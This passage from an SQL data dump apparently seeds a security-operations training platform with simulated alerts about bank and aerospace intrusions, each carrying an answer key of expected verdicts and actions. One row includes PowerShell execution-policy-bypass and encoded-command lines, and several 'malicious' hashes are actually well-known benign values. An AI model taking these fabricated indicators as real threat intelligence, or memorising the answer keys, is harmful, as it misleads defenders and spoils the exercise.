1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1099, 'Initial Access: Phishing Campaign Detected', 'high', 'Email Security Gateway', 'A targeted phishing campaign by Silence Group was detected, aiming to gain initial access to bank networks. Phishing emails with malicious attachments were sent to multiple bank employees to harvest credentials.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"email_id\":\"dcd3f9b1-4f5c-4c2b-bf5e-8a3f3d1a9a5f\",\"sender\":\"alert@bank-security.com\",\"recipient\":\"john.doe@bank.com\",\"subject\":\"Urgent: Account Verification Required\",\"attachment\":{\"filename\":\"Verification_Document.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"smtp_server\":\"smtp.bank.com\",\"phishing_url\":\"http://verify.bank-account.com/login\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_employee_directory\",\"verdict\":\"internal\",\"details\":\"Registered bank employee\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing source IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis_report\",\"verdict\":\"malicious\",\"details\":\"Detected as a known malware hash associated with Silence Group\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://verify.bank-account.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Phishing site masquerading as a legitimate bank login page\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.811Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1100, 'Execution: Suspicious PowerShell Activity', 'high', 'Endpoint Detection and Response', 'An advanced threat actor is executing a PowerShell script designed to deploy ATM control malware. This activity follows a successful phishing campaign targeting financial institutions.', 'Script Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"4624\",\"computer_name\":\"ATM-SERVER-01\",\"user\":\"bank_admin\",\"ip_address\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bank_admin\\\\Documents\\\\atm_control.ps1\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"process_id\":4876,\"parent_process_id\":972,\"parent_command_line\":\"cmd.exe /c start powershell.exe\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ATM control malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_control.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_intelligence\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to control ATM operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"bank_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"clean\",\"details\":\"Authorized user account, likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1101, 'Persistence: Unusual Scheduled Task Creation', 'high', 'System Logs', 'Detected creation of a scheduled task by Silence Group to ensure malware persists through system reboots. The task is set to execute a known malicious binary.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:23Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\SilenceTask\",\"creator_user\":\"admin_user\",\"creator_ip\":\"192.168.1.15\",\"scheduled_time\":\"2023-10-05T14:00:00Z\",\"action\":\"CreateTask\",\"task_file_path\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\SilenceTask.exe\",\"task_md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"creator_username\":\"admin_user\",\"attacker_ip\":\"203.0.113.50\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known Silence Group command and control server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Authorized user account\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1102, 'Lateral Movement: Unauthorized Access to Internal Servers', 'high', 'Network Traffic Analysis', 'Exploiting harvested credentials, the attackers gained access to internal servers using lateral movement techniques. This positions them to manipulate ATM operations and extract financial data. The operation was detected via unusual login patterns and unauthorized access to critical systems.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.25\",\"protocol\":\"RDP\",\"username\":\"j.doe@bank.com\",\"event_type\":\"login_attempt\",\"event_result\":\"success\",\"file_accessed\":\"ntds.dit\",\"hash\":\"8e5c6d3a5968e3e5f2a9f3ef3b2e9cd7\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Successful RDP login using harvested credentials to access critical server.\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe@bank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ntds.dit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for credential dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"8e5c6d3a5968e3e5f2a9f3ef3b2e9cd7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1103, 'Exfiltration: Data Transfer to External IP', 'critical', 'Data Loss Prevention', 'During the final phase of the operation, the Silence Group successfully exfiltrated sensitive data, including financial information, to an external server, critically compromising the bank\'s financial integrity.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:03:45Z\",\"source_ip\":\"10.4.21.67\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_q3_2023.zip\",\"file_hash\":\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\",\"data_size\":\"1.5GB\",\"action\":\"ALLOW\",\"tags\":[\"exfiltration\",\"financial_data\",\"Silence Group\"]}', '2026-01-28 00:08:15', '2026-02-16 17:48:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Silence Group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.4.21.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file suspected in exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1104, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting aerospace engineers. The email contained a malicious link disguised as a project update, aiming to gain initial access to the target systems.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'Closed', 116, '{\"timestamp\":\"2023-10-05T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"email_subject\":\"Project Update: New Aerospace Design\",\"email_from\":\"j.doe@projectsupport.com\",\"email_to\":\"engineer123@aerospacecorp.com\",\"attachment\":\"Aerospace_Project_Update.docx\",\"malicious_url\":\"http://malicious-link.com/update\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.doe@projectsupport.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sender email does not match known domains.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to exploit kits.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.816Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
